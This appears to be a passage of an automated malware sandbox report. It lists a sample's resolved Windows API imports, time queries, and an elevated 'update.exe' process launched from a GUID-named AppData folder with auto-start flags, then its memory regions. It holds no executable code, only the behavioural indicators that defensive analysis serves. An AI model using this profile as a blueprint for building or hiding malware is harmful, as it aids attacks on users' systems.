Get Address	c:\windows\syswow64\rpcrt4.dll	function = UuidCreate, address_out = 0x7716f48b	1	Fn
Get Address	c:\windows\syswow64\mpr.dll	function = WNetCloseEnum, address_out = 0x75392dd6	1	Fn
Get Address	c:\windows\syswow64\mpr.dll	function = WNetOpenEnumW, address_out = 0x75392f06	1	Fn
Get Address	c:\windows\syswow64\mpr.dll	function = WNetEnumResourceW, address_out = 0x75393058	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetOpenA, address_out = 0x75bff18e	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetReadFile, address_out = 0x75beb406	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = HttpQueryInfoW, address_out = 0x75bf5c75	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetCloseHandle, address_out = 0x75beab49	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetOpenW, address_out = 0x75bf9197	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetOpenUrlW, address_out = 0x75c4be5c	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetOpenUrlA, address_out = 0x75c130f1	1	Fn
Get Address	c:\windows\syswow64\winmm.dll	function = timeGetTime, address_out = 0x753526e0	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathFindExtensionW, address_out = 0x76e5a1b9	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathFindFileNameW, address_out = 0x76e5bb71	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathFileExistsA, address_out = 0x76e7ad1a	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathAppendW, address_out = 0x76e581ef	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathRemoveFileSpecW, address_out = 0x76e53248	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathAppendA, address_out = 0x76e4d65e	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathFileExistsW, address_out = 0x76e545bf	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTimeFormatW, address_out = 0x7740f481	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetDateFormatW, address_out = 0x774134d7	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnumSystemLocalesW, address_out = 0x7747425f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetUserDefaultLCID, address_out = 0x773f3da5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsValidLocale, address_out = 0x7740ce46	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLocaleInfoW, address_out = 0x773f3c42	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCommandLineW, address_out = 0x773f5223	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileSize, address_out = 0x773f196e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindFirstFileW, address_out = 0x773f4435	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFilePointer, address_out = 0x773f17d1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrlenA, address_out = 0x773f5a4b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetErrorMode, address_out = 0x773f1b00	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateProcessW, address_out = 0x773f103d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateDirectoryW, address_out = 0x773f4259	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WaitForSingleObject, address_out = 0x773f1136	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLogicalDrives, address_out = 0x773f5371	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WriteFile, address_out = 0x773f1282	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetDriveTypeA, address_out = 0x7740ef75	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = OpenProcess, address_out = 0x773f1986	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GlobalAlloc, address_out = 0x773f588e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetSystemDirectoryW, address_out = 0x773f5063	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WideCharToMultiByte, address_out = 0x773f170d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LoadLibraryW, address_out = 0x773f492b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Sleep, address_out = 0x773f10ff	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CopyFileW, address_out = 0x7741830d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FormatMessageW, address_out = 0x773f4620	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcpynW, address_out = 0x7741d556	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ReadFile, address_out = 0x773f3ed3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateFileW, address_out = 0x773f3f5c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcatA, address_out = 0x77412b7a	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcmpW, address_out = 0x773f5929	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = MultiByteToWideChar, address_out = 0x773f192e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrlenW, address_out = 0x773f1700	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLastError, address_out = 0x773f11c0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetLastError, address_out = 0x773f11a9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetProcAddress, address_out = 0x773f1222	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = MoveFileW, address_out = 0x77409af0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LocalAlloc, address_out = 0x773f168c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateEventW, address_out = 0x773f183e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcatW, address_out = 0x7741828e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindNextFileW, address_out = 0x773f54ee	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CloseHandle, address_out = 0x773f1410	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DeleteFileW, address_out = 0x773f89b3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LocalFree, address_out = 0x773f2d3c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CompareStringW, address_out = 0x773f3bca	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetPriorityClass, address_out = 0x7740cf28	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentProcess, address_out = 0x773f1809	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetComputerNameW, address_out = 0x773fdd0e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetExitCodeProcess, address_out = 0x7740174d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleFileNameW, address_out = 0x773f4950	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GlobalFree, address_out = 0x773f5558	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateMutexA, address_out = 0x773f4c6b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetVersion, address_out = 0x773f4467	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentProcessId, address_out = 0x773f11f8	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateThread, address_out = 0x773f34d5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateFileA, address_out = 0x773f53c6	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateDirectoryA, address_out = 0x7741d526	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcpyA, address_out = 0x77412a9d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FatalAppExitA, address_out = 0x77474691	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateSemaphoreW, address_out = 0x7740ca5a	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleHandleW, address_out = 0x773f34b0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTickCount, address_out = 0x773f110c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TlsFree, address_out = 0x773f3587	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TlsSetValue, address_out = 0x773f14fb	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TlsGetValue, address_out = 0x773f11e0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TlsAlloc, address_out = 0x773f49ad	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InitializeCriticalSectionAndSpinCount, address_out = 0x773f1916	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetUnhandledExceptionFilter, address_out = 0x773f87c9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = UnhandledExceptionFilter, address_out = 0x7741772f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FreeEnvironmentStringsW, address_out = 0x773f51cb	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetEnvironmentStringsW, address_out = 0x773f51e3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetSystemTimeAsFileTime, address_out = 0x773f3509	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = QueryPerformanceCounter, address_out = 0x773f1725	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetStartupInfoW, address_out = 0x773f4d40	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DeleteCriticalSection, address_out = 0x77ac45f5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileType, address_out = 0x773f3531	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = RaiseException, address_out = 0x773f58a6	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LCMapStringW, address_out = 0x773f17b9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetConsoleCP, address_out = 0x77497bff	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetConsoleMode, address_out = 0x773f1328	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFilePointerEx, address_out = 0x7740c807	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetConsoleCtrlHandler, address_out = 0x773f8a09	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FreeLibrary, address_out = 0x773f34c8	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LoadLibraryExW, address_out = 0x773f495d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = OutputDebugStringW, address_out = 0x7741d1d4	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapReAlloc, address_out = 0x77ad1f6e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = RtlUnwind, address_out = 0x7741d1c3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetStdHandle, address_out = 0x7747454f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapFree, address_out = 0x773f14c9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapAlloc, address_out = 0x77abe026	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WriteConsoleW, address_out = 0x77417aca	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlushFileBuffers, address_out = 0x773f469b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetStringTypeW, address_out = 0x773f1946	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LeaveCriticalSection, address_out = 0x77ab2270	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnterCriticalSection, address_out = 0x77ab22b0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapSize, address_out = 0x77ac3002	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetStdHandle, address_out = 0x773f51b3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = AreFileApisANSI, address_out = 0x774740d1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleHandleExW, address_out = 0x773f4a6f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ExitProcess, address_out = 0x773f7a10	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetProcessHeap, address_out = 0x773f14e9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentThreadId, address_out = 0x773f1450	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentThread, address_out = 0x773f17ec	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsValidCodePage, address_out = 0x773f4493	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetACP, address_out = 0x773f179c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetOEMCP, address_out = 0x7741d1a1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCPInfo, address_out = 0x773f5189	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsDebuggerPresent, address_out = 0x773f4a5d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcpyW, address_out = 0x77413102	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsProcessorFeaturePresent, address_out = 0x773f5235	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = PostQuitMessage, address_out = 0x75e69abb	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = LoadCursorW, address_out = 0x75e688f7	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = BeginPaint, address_out = 0x75e71361	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = TranslateMessage, address_out = 0x75e67809	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = RegisterClassExW, address_out = 0x75e6b17d	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = ShowWindow, address_out = 0x75e70dfb	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = IsWindow, address_out = 0x75e67136	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = CreateWindowExW, address_out = 0x75e68a29	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = UpdateWindow, address_out = 0x75e73559	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DefWindowProcW, address_out = 0x77ac25dd	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = PeekMessageW, address_out = 0x75e705ba	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = PostThreadMessageW, address_out = 0x75e68bff	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = MessageBoxW, address_out = 0x75ebfd3f	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DispatchMessageW, address_out = 0x75e6787b	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DestroyWindow, address_out = 0x75e69a55	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = EndPaint, address_out = 0x75e71341	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = SendMessageW, address_out = 0x75e69679	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = GetMessageW, address_out = 0x75e678e2	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CloseServiceHandle, address_out = 0x7573369c	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptAcquireContextW, address_out = 0x7572df14	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetUserNameW, address_out = 0x7573157a	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptHashData, address_out = 0x7572df36	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegSetValueExW, address_out = 0x757314d6	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegCloseKey, address_out = 0x7573469d	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptDestroyHash, address_out = 0x7572df66	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = OpenSCManagerW, address_out = 0x7572ca64	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = OpenServiceW, address_out = 0x7572ca4c	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = ControlService, address_out = 0x75747144	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegOpenKeyExW, address_out = 0x7573468d	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptCreateHash, address_out = 0x7572df4e	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = QueryServiceStatus, address_out = 0x75732a86	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegQueryValueExW, address_out = 0x757346ad	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptReleaseContext, address_out = 0x7572e124	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptGetHashParam, address_out = 0x7572df7e	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = SHGetPathFromIDListW, address_out = 0x760317bf	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = SHGetSpecialFolderLocation, address_out = 0x7602e141	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = CommandLineToArgvW, address_out = 0x75fb9ee8	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = ShellExecuteA, address_out = 0x761e7078	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = ShellExecuteExW, address_out = 0x75fc1e46	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoInitialize, address_out = 0x7582b636	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoInitializeSecurity, address_out = 0x75837259	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoUninitialize, address_out = 0x758586d3	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoCreateInstance, address_out = 0x75859d0b	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 202, address_out = 0x7700fd6b	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 2, address_out = 0x77004642	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 9, address_out = 0x77003eae	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 8, address_out = 0x77003ed5	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 6, address_out = 0x77003e59	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 200, address_out = 0x77003f21	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 12, address_out = 0x77005dee	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 201, address_out = 0x77004af8	1	Fn
Get Address	c:\windows\syswow64\iphlpapi.dll	function = GetAdaptersInfo, address_out = 0x75339263	1	Fn
Get Address	c:\windows\syswow64\ws2_32.dll	function = 12, address_out = 0x757db131	1	Fn
Get Address	c:\windows\syswow64\ws2_32.dll	function = 11, address_out = 0x757d311b	1	Fn
Get Address	c:\windows\syswow64\ws2_32.dll	function = 52, address_out = 0x757e7673	1	Fn
Get Address	c:\windows\syswow64\dnsapi.dll	function = DnsFree, address_out = 0x752d436b	1	Fn
Get Address	c:\windows\syswow64\dnsapi.dll	function = DnsQuery_W, address_out = 0x752e572c	1	Fn
Get Address	c:\windows\syswow64\msvcr100.dll	function = atexit, address_out = 0x7522c544	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InitializeCriticalSectionEx, address_out = 0x773f4d28	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateEventExW, address_out = 0x7747410b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateSemaphoreExW, address_out = 0x77474195	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetThreadStackGuarantee, address_out = 0x773fd31f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateThreadpoolTimer, address_out = 0x7740ee7e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetThreadpoolTimer, address_out = 0x77ad441c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WaitForThreadpoolTimerCallbacks, address_out = 0x77afc50e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CloseThreadpoolTimer, address_out = 0x77afc381	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateThreadpoolWait, address_out = 0x7740f088	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetThreadpoolWait, address_out = 0x77ae05d7	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CloseThreadpoolWait, address_out = 0x77afca24	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlushProcessWriteBuffers, address_out = 0x77ab0b8c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FreeLibraryWhenCallbackReturns, address_out = 0x77b6fde8	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentProcessorNumber, address_out = 0x77b01e1d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLogicalProcessorInformation, address_out = 0x77474761	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateSymbolicLinkW, address_out = 0x7746cd11	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetDefaultDllDirectories, address_out = 0x0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnumSystemLocalesEx, address_out = 0x7747424f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CompareStringEx, address_out = 0x774746b1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetDateFormatEx, address_out = 0x77486676	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLocaleInfoEx, address_out = 0x77474751	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTimeFormatEx, address_out = 0x774865f1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetUserDefaultLocaleName, address_out = 0x774747c1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsValidLocaleName, address_out = 0x774747e1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LCMapStringEx, address_out = 0x774747f1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentPackageId, address_out = 0x0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTickCount64, address_out = 0x7740eee0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileInformationByHandleExW, address_out = 0x0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFileInformationByHandleW, address_out = 0x0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnumProcesses, address_out = 0x0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnumProcessModules, address_out = 0x0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleBaseNameW, address_out = 0x0	1	Fn
Get Address	c:\windows\syswow64\psapi.dll	function = EnumProcesses, address_out = 0x770c1544	1	Fn
Get Address	c:\windows\syswow64\psapi.dll	function = EnumProcessModules, address_out = 0x770c1408	1	Fn
Get Address	c:\windows\syswow64\psapi.dll	function = GetModuleBaseNameW, address_out = 0x770c152c	1	Fn

System (5)

Operation	Additional Information	Count	Logfile
Get Time	type = System Time, time = 2018-11-19 13:56:59 (UTC)	1	Fn
Get Time	type = Ticks, time = 17238	1	Fn
Get Time	type = System Time, time = 2018-11-19 13:57:09 (UTC)	1	Fn
Get Info	type = Operating System	1	Fn
Get Info	type = Operating System	1	Fn

Environment (2)

Operation	Additional Information	Success	Count	Logfile
Get Environment String	-		2	Fn Data

Process #15: update.exe

5817

Information	Value
ID	#15
File Name	c:\users\5p5nrgjn0js halpmcxz\appdata\local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe
Command Line	"C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe" --Admin IsAutoStart IsNotTask
Initial Working Directory	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\
Monitor	Start Time: 00:01:49, Reason: Child Process
Unmonitor	End Time: 00:02:29, Reason: Self Terminated
Monitor Duration	00:00:40

OS Process Information

Information	Value
PID	0x68c
Parent PID	0x4cc (c:\users\5p5nrgjn0js halpmcxz\appdata\local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x 6B0 0x 718 0x 710 0x 720 0x 72C 0x 698 0x 69C 0x 730 0x 5F0 0x 5EC 0x 5F8

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	rw	-
private_0x0000000000030000	0x00030000	0x00031fff	Private Memory	rw	-
private_0x0000000000030000	0x00030000	0x00030fff	Private Memory	rw	-
apisetschema.dll	0x00040000	0x00040fff	Memory Mapped File	rwx	-
private_0x0000000000050000	0x00050000	0x0008ffff	Private Memory	rw	-
private_0x0000000000090000	0x00090000	0x0018ffff	Private Memory	rw	-
pagefile_0x0000000000190000	0x00190000	0x00193fff	Pagefile Backed Memory	r	-
locale.nls	0x001a0000	0x00206fff	Memory Mapped File	r	-
private_0x0000000000210000	0x00210000	0x0024ffff	Private Memory	rw	-
pagefile_0x0000000000210000	0x00210000	0x00214fff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000210000	0x00210000	0x00211fff	Pagefile Backed Memory	r	-
windowsshell.manifest	0x00220000	0x00220fff	Memory Mapped File	r	-
pagefile_0x0000000000220000	0x00220000	0x00220fff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000230000	0x00230000	0x00231fff	Pagefile Backed Memory	r	-
private_0x0000000000240000	0x00240000	0x0024ffff	Private Memory	rw	-
private_0x0000000000250000	0x00250000	0x0029efff	Private Memory	rw	-
private_0x0000000000250000	0x00250000	0x0028ffff	Private Memory	rw	-
index.dat	0x00290000	0x0029ffff	Memory Mapped File	rw	... Region Actions Download Dump
private_0x00000000002a0000	0x002a0000	0x002affff	Private Memory	rw	-
rsaenh.dll	0x002b0000	0x002ebfff	Memory Mapped File	r	-
private_0x00000000002b0000	0x002b0000	0x002effff	Private Memory	rw	-
private_0x00000000002f0000	0x002f0000	0x0036ffff	Private Memory	rw	-
private_0x0000000000370000	0x00370000	0x003effff	Private Memory	rw	-
index.dat	0x00370000	0x00377fff	Memory Mapped File	rw	... Region Actions Download Dump
index.dat	0x00380000	0x0038ffff	Memory Mapped File	rw	... Region Actions Download Dump
private_0x0000000000390000	0x00390000	0x00390fff	Private Memory	rw	-
pagefile_0x0000000000390000	0x00390000	0x00390fff	Pagefile Backed Memory	r	-
pagefile_0x00000000003a0000	0x003a0000	0x003a0fff	Pagefile Backed Memory	r	-
private_0x00000000003b0000	0x003b0000	0x003effff	Private Memory	rw	-
pagefile_0x00000000003f0000	0x003f0000	0x003f0fff	Pagefile Backed Memory	r	-
update.exe	0x00400000	0x0049afff	Memory Mapped File	rwx	... Region Actions Download Dump
private_0x00000000004a0000	0x004a0000	0x005dffff	Private Memory	rw	-
private_0x00000000004a0000	0x004a0000	0x0059ffff	Private Memory	rw	-
pagefile_0x00000000005a0000	0x005a0000	0x005a0fff	Pagefile Backed Memory	rw	-
pagefile_0x00000000005b0000	0x005b0000	0x005b6fff	Pagefile Backed Memory	r	-
pagefile_0x00000000005c0000	0x005c0000	0x005c1fff	Pagefile Backed Memory	rw	-
private_0x00000000005d0000	0x005d0000	0x005dffff	Private Memory	rw	-
private_0x00000000005f0000	0x005f0000	0x006effff	Private Memory	rw	-
pagefile_0x00000000006f0000	0x006f0000	0x00877fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000880000	0x00880000	0x00a00fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000a10000	0x00a10000	0x01e0ffff	Pagefile Backed Memory	r	-
private_0x0000000001e10000	0x01e10000	0x01fbffff	Private Memory	rw	-
private_0x0000000001e10000	0x01e10000	0x01e4ffff	Private Memory	rw	-
private_0x0000000001e50000	0x01e50000	0x01f4ffff	Private Memory	rw	-
private_0x0000000001f80000	0x01f80000	0x01fbffff	Private Memory	rw	-
sortdefault.nls	0x01fc0000	0x0228efff	Memory Mapped File	r	-
private_0x0000000002290000	0x02290000	0x0848ffff	Private Memory	rw	-
private_0x0000000002290000	0x02290000	0x0238ffff	Private Memory	rw	-
private_0x0000000008490000	0x08490000	0x084cffff	Private Memory	rw	-
private_0x00000000084d0000	0x084d0000	0x085cffff	Private Memory	rw	-
private_0x00000000085d0000	0x085d0000	0x0860ffff	Private Memory	rw	-
private_0x0000000008610000	0x08610000	0x0870ffff	Private Memory	rw	-
private_0x0000000008710000	0x08710000	0x0874ffff	Private Memory	rw	-
private_0x0000000008750000	0x08750000	0x0884ffff	Private Memory	rw	-
private_0x0000000008850000	0x08850000	0x0894ffff	Private Memory	rw	-
private_0x0000000008950000	0x08950000	0x0898ffff	Private Memory	rw	-
index.dat	0x08990000	0x089cffff	Memory Mapped File	rw	... Region Actions Download Dump
